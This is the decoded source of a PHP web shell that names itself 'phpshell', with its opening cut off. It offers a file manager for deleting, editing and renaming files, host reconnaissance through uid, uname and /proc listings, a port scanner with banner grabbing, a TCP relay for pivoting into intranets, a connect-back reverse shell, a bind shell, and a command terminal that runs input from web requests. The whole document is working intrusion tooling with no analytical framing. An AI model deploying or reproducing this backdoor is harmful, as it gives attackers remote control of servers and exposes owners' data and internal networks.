/* Decoded by unphp.net */ '; $fp=@fopen($file_name, "r"); $data=@fread($fp, filesize($file_name)); echo ' '; } else { $fp=@fopen($file_name, "w+"); $result=@fwrite($fp, $_POST['newcontent']); @fclose($fp); if ($result == false) { echo "edit failed."; } else { echo "edit ok."; } } } function rename_file($old_file_name, $new_file_name) { if (file_exists($old_file_name) == false) { echo "file $old_file_name not exist. "; return -1; } if (rename($old_file_name, $new_file_name) == false) { echo "rename $old_file_name to $new_file_name failed. "; return -1; } echo "rename $old_file_name to $new_file_name ok. "; return 0; } function get_human_size($bytes) { $type=array("Bytes", "KB", "MB", "GB", "TB"); $idx=0; while ($bytes >= 1024) { $bytes /= 1024; $idx++; } return (intval($bytes)." ".$type[$idx]); } function get_file_perms($file_name) { return (substr(sprintf('%o', fileperms($file_name)), -4)); } function get_human_file_perms($file_name) { $perms = fileperms($file_name); if (($perms & 0xC000) == 0xC000) { $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { $info = 'p'; } else { $info = 'u'; } $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function get_file_owner($file_name) { $uid=fileowner($file_name); $user_info = posix_getpwuid($uid); return $user_info['name']; } function read_dir($dir_path) { if (is_dir($dir_path)) { if (($dp = opendir($dir_path)) == false) { echo "open $dir_path failed. "; return -1; } while (($file_name = readdir($dp)) != false) { if ($file_name == "." || $file_name == "..") continue; $sub_path = $dir_path."/".$file_name; echo "$sub_path "; } } closedir($dp); return 0; } function read_dirs($dir_path) { echo ' '; if (is_dir($dir_path)) { if (($dp = opendir($dir_path)) == false) { echo "open $dir_path failed. "; return -1; } while (($file_name = readdir($dp)) != false) { if ($file_name == "." || $file_name == "..") continue; $sub_path = $dir_path."/".$file_name; $last_modify_time=date("Y/m/d H:i:s", fileatime($file_name)); $file_size=filesize($file_name); $file_size_string=get_human_size($file_size); $file_perms=get_file_perms($file_name); $file_perms_string=get_human_file_perms($file_name); $file_owner=get_file_owner($file_name); echo ''; } } echo '
'.$file_name.' '.$last_modify_time.' '.$file_size_string.' '.$file_perms.' / '.$file_perms_string.' / '.$file_owner.' Delete Edit Download Rename
'; closedir($dp); return 0; } function aio_directory() { $curr_path=getcwd(); return read_dirs($curr_path); } function search_file_by_name($dir_path, $target_file) { if (is_dir($dir_path)) { if (($dp = opendir($dir_path)) == false) { echo "open $dir_path failed. "; return -1; } while (($file_name = readdir($dp)) != false) { if ($file_name == "." || $file_name == "..") continue; $sub_path = $dir_path."/".$file_name; if (is_dir($sub_path)) { search_file_by_name($sub_path, $target_file); } if (!strcmp($file_name, $target_file)) { echo "found $target_file. "; closedir($dp); return 0; } } echo "not found $target_file. "; closedir($dp); } return -1; } /** * show file attribute with cetern flag. * * @dir_path - directroy to search. * @attr_flag - 0 readable. * - 1 writeable. * - 2 executable. */ function show_attr_file($dir_path, $attr_flag) { if (is_dir($dir_path)) { if (($dp = opendir($dir_path)) == false) { echo "open $dir_path failed. "; return -1; } while (($file_name = readdir($dp)) != false) { if ($file_name == "." || $file_name == "..") continue; $sub_path = $dir_path."/".$file_name; if (is_dir($sub_path)) { show_attr_file($sub_path, $attr_flag); } if ($attr_flag == 0) { if (is_readable($file_name)) echo "$sub_path "; } else if ($attr_flag == 1) { if (is_writable($file_name)) echo "$sub_path "; } else if ($attr_flag == 2) { if (is_executable($file_name)) echo "$sub_path "; } else { echo "wrong attribute flag. "; break; } } closedir($dp); } return 0; } function create_dir($dir_path) { if (file_exists($dir_path)) return -1; if (mkdir($dir_path, 0700) == false) { echo "create $dir_path failed. "; return -1; } echo "create $dir_path ok. "; return 0; } function destroy_dir($dir_path) { if (file_exists($dir_path) == false) return -1; if (rmdir($dir_path) == false) { echo "delete $dir_path failed. "; return -1; } echo "delete $dir_path ok. "; return 0; } function destroy_dirs($dir_path) { if (is_dir($dir_path)) { if (($dp = opendir($dir_path)) == false) { echo "open $dir_path failed. "; return -1; } while (($file_name = readdir($dp)) != false) { if ($file_name == "." || $file_name == "..") continue; $sub_path = $dir_path."/".$file_name; if (is_dir($sub_path)) { destroy_dirs($sub_path); } else delete_file($sub_path); } closedir($dp); destroy_dir($dir_path); return 0; } return 0; } function linux_id() { $uid = posix_getuid(); $user_info = posix_getpwuid($uid); echo "uid=".$uid."(".$user_info['name'].") "; echo "gid=".$user_info['gid']."(".$user_info['name'].") "; echo "dir=".$user_info['dir']." "; echo "shell=".$user_info['shell']." "; } function linux_uname() { $uname = posix_uname(); echo $uname['sysname']." ".$uname['nodename']." ".$uname['release']." "; echo $uname['version']." ".$uname['machine']; } function get_proc_name($file_name) { $fp = fopen($file_name, "r"); if ($fp == false) { echo "open $file_name failed. "; return -1; } while (($buf = fgets($fp, 1024)) != false ) { if (strstr($buf, "Name:") != NULL) { sscanf($buf, "%s %s", $tmp, $name); fclose($fp); return $name; } } fclose($fp); return 0; } function get_proc_cmd($file_name) { $fp = fopen($file_name, "r"); if ($fp == false) { echo "open $file_name failed. "; return -1; } $cmd = fgets($fp, 1024); fclose($fp); return $cmd; } function linux_ps() { if (($dp = opendir("/proc")) == false) { echo "open /proc failed. "; return -1; } echo "open /proc ok. "; while (($file_name = readdir($dp)) != false) { if ($file_name == "." || $file_name == "..") continue; if (ctype_digit($file_name) == false) continue; $dir_path = "/proc/$file_name/status"; $proc_name = get_proc_name($dir_path); $dir_path = "/proc/$file_name/cmdline"; $proc_cmd = get_proc_cmd($dir_path); echo $file_name." ".$proc_name." ".$proc_cmd." "; } closedir($dp); return 0; } function tcp_connect($host, $port) { $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket == false) { echo "create socket error. "; return -1; } if (@socket_connect($socket, $host, $port) == false) { socket_close($socket); return -1; } return $socket; } function tcp_connect_timeout($host, $port, $timeout) { $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket == false) { echo "create socket error. "; return -1; } if (socket_set_nonblock($socket) == false) { echo "set nonblock error. "; socket_close($socket); return -1; } $time = time(); while (!@socket_connect($socket, $host, $port)) { $err = socket_last_error($socket); if ($err == 115 || $err == 114) { if ((time() - $time) >= $timeout) { socket_close($socket); echo "socket timeout. "; return -1; } sleep(1); continue; } socket_close($socket); return -1; } echo "connect to $host:$port ok. "; return $socket; } function run_proxy_client($remote_host1, $remote_port1, $remote_host2, $remote_port2) { $socket1 = tcp_connect($remote_host1, $remote_port1); if ($socket1 == -1) { echo "connect to $remote_host1:$remote_port1 failed. "; return -1; } echo "connect to $remote_host1:$remote_port1 ok. "; $socket2 = tcp_connect($remote_host2, $remote_port2); if ($socket2 == -1) { echo "connect to $remote_host2:$remote_port2 failed. "; socket_close($socket1); return -1; } echo "connect to $remote_host2:$remote_port2 ok. "; run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2); return 0; } function web_proxy_client() { echo '
intranet host intranet port
public host public port

'; if (empty($_POST['intranet_host']) || empty($_POST['intranet_port']) || empty($_POST['public_host']) || empty($_POST['public_port'])) return -1; run_proxy_client($_POST['intranet_host'], $_POST['intranet_port'], $_POST['public_host'], $_POST['public_port']); } function run_proxy_core($socket1, $remote_host1, $socket2, $remote_host2) { while (true) { $read_sockets = array($socket1, $socket2); $write_sockets = NULL; $except_sockets = NULL; if (socket_select($read_sockets, $write_sockets, $except, 0) == -1) { echo "socket_select error ".socket_strerror(socket_last_error())." "; break; } if (in_array($socket2, $read_sockets)) { //echo "got data from $remote_host2. "; $bytes2 = socket_recv($socket2, $buf2, 1024, MSG_DONTWAIT); if ($bytes2 == false) { echo "socket_recv ".socket_strerror(socket_last_error($socket2))." "; break; } //echo "got bytes $bytes2. "; if ($bytes2 == 0) { echo "recv no data from $remote_host2. "; break; } $ret2 = socket_send($socket1, $buf2, $bytes2, MSG_EOR); if ($ret2 == false) { echo "socket_send ".socket_strerror(socket_last_error($socket1))." "; break; } if ($ret2 != $bytes2) { echo "send data failed. "; break; } //echo "write $ret2 bytes ok. "; } if (in_array($socket1, $read_sockets)) { //echo "got data from $remote_host1. "; $bytes1 = socket_recv($socket1, $buf1, 1024, MSG_DONTWAIT); if ($bytes1 == false) { echo "socket_recv ".socket_strerror(socket_last_error($socket1))." "; break; } //echo "got bytes $bytes1. "; if ($bytes1 == 0) { echo "recv no data from $remote_host1. "; break; } $ret1 = socket_send($socket2, $buf1, $bytes1, MSG_EOR); if ($ret1 == false) { echo "socket_send ".socket_strerror(socket_last_error($socket2))." "; break; } if ($ret1 != $bytes1) { echo "send data failed. "; break; } //echo "write $ret1 bytes ok. "; } } echo "proxy done. "; socket_close($socket1); socket_close($socket2); return 0; } function init_proxy_server($local_port) { $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket == false) { echo "create socket error. "; return -1; } if (socket_bind($socket, '0', $local_port) == false) { echo "bind sock error. "; socket_close($socket); return -1; } if (socket_listen($socket) == false) { echo "listen sock error. "; socket_close($socket); return -1; } echo "listen on port $local_port ok. "; return $socket; } function run_proxy_server($local_port1, $local_port2) { $socket1 = init_proxy_server($local_port1); if ($socket1 == -1) return -1; while (true) { if (($newsock1 = socket_accept($socket1)) !== false) { socket_getpeername($newsock1, $ip1); echo "got a client form $ip1 "; break; } } $socket2 = init_proxy_server($local_port2); if ($socket2 == -1) return -1; while (true) { if (($newsock2 = socket_accept($socket2)) !== false) { socket_getpeername($newsock2, $ip2); echo "got a client form $ip2 "; break; } } echo "start transmit data ... "; run_proxy_core($newsock2, $ip2, $newsock1, $ip1); socket_close($socket2); socket_close($socket1); return 0; } function tcp_connect_port($host, $port, $timeout) { $fp = @fsockopen($host, $port, $errno, $errstr, $timeout); return $fp; } function port_scan_fast($host, $timeout, $banner) { $general_ports = array( '21'=>'FTP', '22'=>'SSH', '23'=>'Telnet', '25'=>'SMTP', '79'=>'Finger', '80'=>'HTTP', '81'=>'HTTP/Proxy', '110'=>'POP3', '135'=>'MS Netbios', '139'=>'MS Netbios', '143'=>'IMAP', '162'=>'SNMP', '389'=>'LDAP', '443'=>'HTTPS', '445'=>'MS SMB', '873'=>'rsync', '1080'=>'Proxy/HTTP Server', '1433'=>'MS SQL Server', '2433'=>'MS SQL Server Hidden', '1521'=>'Oracle DB Server', '1522'=>'Oracle DB Server', '3128'=>'Squid Cache Server', '3129'=>'Squid Cache Server', '3306'=>'MySQL Server', '3307'=>'MySQL Server', '3500'=>'Squid Cache Server', '3389'=>'MS Terminal Service', '5800'=>'VNC Server', '5900'=>'VNC Server', '8080'=>'Proxy/HTTP Server', '10000'=>'Webmin', '11211'=>'Memcached' ); echo ''; foreach($general_ports as $port=>$name) { if (($fp = tcp_connect_port($host, $port, $timeout)) != false) { if (empty($banner) == false) { $data = fgets($fp, 128); echo ''; } else { echo ''; } fclose($fp); } } echo '
'.$host.' '.$port.' '.$name.' '.$data.'
'.$host.' '.$port.' '.$name.'
'; } function port_scan($host, $src_port, $dst_port, $timeout, $banner) { echo ''; for ($port = $src_port; $port <= $dst_port; $port++) { if (($fp = tcp_connect_port($host, $port, $timeout)) != false) { if (empty($banner) == false) { $data = fgets($fp, 128); echo ''; } else { echo ''; } fclose($fp); } } echo '
Host Port State
'.$host.' '.$port.' '.$data.'
'.$host.' '.$port.' OPEN
'; } function run_portscan() { echo '
target host timeout general ports banner
'; if (empty($_POST['scan_host'])) return -1; if (isset($_POST['scan_fast'])) { port_scan_fast($_POST['scan_host'], $_POST['scan_timeout'], $_POST['scan_banner']); } else { port_scan($_POST['scan_host'], "1", "65535", $_POST['scan_timeout'], $_POST['scan_banner']); } } function linux_exec($socket, $cmd) { $handle = popen($cmd, "r"); while (($buf = fgets($handle, 1024)) != false) { $ret = socket_write($socket, $buf, strlen($buf)); if ($ret == false) { return -1; } } pclose($handle); return 0; } function connect_backdoor($host, $port) { $banner = "connect back from phpshell "; $socket = tcp_connect($host, $port); if ($socket == -1) { echo "connect to $host:$port failed. "; return -1; } echo "connect to $host:$port ok. "; $ret = socket_write($socket, $banner, strlen($banner)); if ($ret == false) { echo "write data failed. "; socket_close($socket); return -1; } while (true) { $buf = socket_read($socket, 1024); echo $buf; linux_exec($socket, $buf); } } function bindshell($local_port) { $banner = "bindshell from phpshell "; $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); if ($socket == false) { echo "create socket error. "; return -1; } if (socket_bind($socket, '0', $local_port) == false) { echo "bind sock error. "; socket_close($socket); return -1; } if (socket_listen($socket) == false) { echo "listen sock error. "; socket_close($socket); return -1; } echo "listen on port $local_port ok. "; while (true) { if (($newsock = socket_accept($socket)) !== false) { socket_getpeername($newsock, $ip); echo "got a client form $ip"."
"; break; } } $ret = socket_write($newsock, $banner, strlen($banner)); if ($ret == false) { echo "write data failed. "; socket_close($newsock); socket_close($socket); return -1; } while (true) { $buf = socket_read($newsock, 1024); echo $buf; linux_exec($newsock, $buf); } socket_close($newsock); socket_close($socket); return 0; } function run_backdoor() { echo '
Target host Target port

Bind port
'; if ($_POST['target_host'] && $_POST['target_port']) { connect_backdoor($_POST['target_host'], $_POST['target_port']); } if ($_POST['bind_port']) { bindshell($_POST['bind_port']); } } /* function exec_shell($cmd) { $handle = popen($cmd, "r"); while (($buf = fgets($handle, 1024)) != false) { echo $buf; } pclose($handle); return 0; } function run_shell() { $host_name = gethostbyaddr($_SERVER['SERVER_NAME']); $uid = posix_getuid(); $user_info = posix_getpwuid($uid); echo '
'.$user_info['name'].'@'.$host_name.'$

'; } } */ function run_terminal_shell($cmd) { $handle = popen($cmd, "r"); while (($buf = fgets($handle, 1024)) != false) { $data .= $buf.""; } pclose($handle); return $data; } function aio_shell() { $host_name = gethostbyaddr($_SERVER['SERVER_NAME']); $uid = posix_getuid(); $user_info = posix_getpwuid($uid); $curr_path = getcwd(); $prompt=$user_info['name'].'@'.$host_name.':'.$curr_path; echo '

'.$prompt.'$'.'
'; } function webshell_main() { if (isset($_GET['cmd'])) { if ($_GET['cmd'] == "backdoor") { run_backdoor(); } if ($_GET['cmd'] == "shell") { aio_shell(); } if ($_GET['cmd'] == "portscan") { run_portscan(); } if ($_GET['cmd'] == "proxy") { web_proxy_client(); } } else { echo ' '; } } function aio_main() { $uid = posix_getuid(); $user_info = posix_getpwuid($uid); $uid_banner="uid=".$uid."(".$user_info['name'].") ". "gid=".$user_info['gid']."(".$user_info['name'].") ". "dir=".$user_info['dir']." ". "shell=".$user_info['shell']; $uname = posix_uname(); $uname_banner=$uname['sysname']." ".$uname['nodename']." ".$uname['release']." ". $uname['version']." ".$uname['machine']; $server_addr=$_SERVER['SERVER_NAME']; $server_port= $_SERVER['SERVER_PORT']; $server_time=date("Y/m/d h:i:s",time()); $phpsoft=$_SERVER['SERVER_SOFTWARE']; $php_version=PHP_VERSION; $zend_version=zend_version(); $dis_func=get_cfg_var("disable_functions"); $safemode=@ini_get('safe_mode'); if ($safemode == false) $safemode="On"; $cwd_path=getcwd(); $total_disk=disk_total_space("/"); $total_disk_gb=intval($total_disk/(1024*1024*1024)); $free_disk=disk_free_space("/"); $free_disk_gb=intval($free_disk/(1024*1024*1024)); echo '
show directorys connect backdoor port scan reverse proxy cmd shell



'; if ($_GET['cmd']) { if ($_GET['cmd'] == "dir") { aio_directory(); } if ($_GET['cmd'] == "backdoor") { run_backdoor(); } if ($_GET['cmd'] == "shell") { aio_shell(); } if ($_GET['cmd'] == "portscan") { run_portscan(); } if ($_GET['cmd'] == "proxy") { web_proxy_client(); } } if ($_GET['delete']) { delete_file($_GET['delete']); } if ($_GET['edit']) { edit_file($_GET['edit']); } } aio_main(); ?>